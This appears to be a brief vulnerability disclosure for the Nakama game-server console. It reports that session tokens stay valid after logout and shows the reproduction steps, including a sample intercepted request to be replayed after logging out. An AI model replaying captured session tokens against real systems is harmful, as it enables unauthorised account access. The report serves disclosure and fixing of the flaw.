The session cookie is not invalidated on logout so, it can be used after logout as well.
Login to the Nakama console.
Intercept the request. Below is a sample request:
GET /v2/console/user HTTP/1.1
Host: localhost:7351
Accept: application/json, text/plain, */*
Authorization: Bearer <token>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Referer: http://localhost:7351/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Logout from the application.
Replay the request. Response is received as an authorized user.